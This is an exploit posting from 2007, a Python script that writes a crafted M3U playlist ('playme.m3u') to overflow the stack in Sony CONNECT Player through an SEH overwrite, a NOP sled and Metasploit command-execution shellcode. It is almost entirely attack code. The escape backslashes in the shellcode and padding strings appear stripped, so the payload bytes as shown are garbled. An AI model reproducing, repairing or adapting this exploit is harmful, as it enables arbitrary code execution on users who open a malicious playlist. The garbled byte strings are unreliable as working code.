sony-overflow.txt
Posted on 30 October 2007
#!/usr/bin/python #Secunia Advisory : SA27270 #Release Date : 2007-10-29 # Sony CONNECT Player M3U Playlist Processing Stack Buffer Overflow (m3u File) Local Exploit # Bug discovered by Parvez Anwar # Exploit Written by TaMBaRuS (tambarus@gmail.com) # Tested on: Sony CONNECT Player (SonicStage) 4.x installed on Windows XP SP2/ 2k SP4 # Shellcode: Windows Execute Command <metasploit.com> # Eductional Purposes only ;) ## from struct import pack m3u = ("#EXTM3U http://%s") shellcode = ( "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44" "x42x30x42x50x42x50x4bx58x45x44x4ex33x4bx48x4ex57" "x45x50x4ax57x41x30x4fx4ex4bx38x4fx34x4ax31x4bx58" "x4fx35x42x32x41x50x4bx4ex49x54x4bx38x46x43x4bx58" "x41x50x50x4ex41x53x42x4cx49x49x4ex4ax46x58x42x4c" "x46x57x47x50x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e" "x46x4fx4bx53x46x35x46x42x46x30x45x57x45x4ex4bx38" "x4fx45x46x52x41x50x4bx4ex48x56x4bx48x4ex50x4bx54" "x4bx48x4fx45x4ex51x41x30x4bx4ex4bx58x4ex51x4bx48" "x41x50x4bx4ex49x58x4ex55x46x52x46x50x43x4cx41x53" "x42x4cx46x56x4bx38x42x34x42x33x45x38x42x4cx4ax47" "x4ex50x4bx38x42x44x4ex50x4bx38x42x47x4ex41x4dx4a" "x4bx48x4ax56x4ax30x4bx4ex49x30x4bx48x42x48x42x4b" "x42x50x42x30x42x50x4bx38x4ax36x4ex43x4fx35x41x43" "x48x4fx42x56x48x55x49x58x4ax4fx43x38x42x4cx4bx57" "x42x35x4ax56x42x4fx4cx48x46x50x4fx45x4ax56x4ax49" "x50x4fx4cx38x50x30x47x55x4fx4fx47x4ex43x46x41x36") NEXT_SEH_RECORD = 0x909006EB # JMP SHORT + 0x06 SE_HANDLER = 0x7CEA53D2 # POP POP RET (SHELL32.DLL/2k SP4) buf = "PLAY ME" buf += "x3e" * 1062 buf += pack("<L", NEXT_SEH_RECORD) buf += pack("<L", SE_HANDLER) buf += "x90" * 90 buf += shellcode m3u %= buf fd = open("playme.m3u", "w") fd.write(m3u) fd.close() print "DONE" # EoF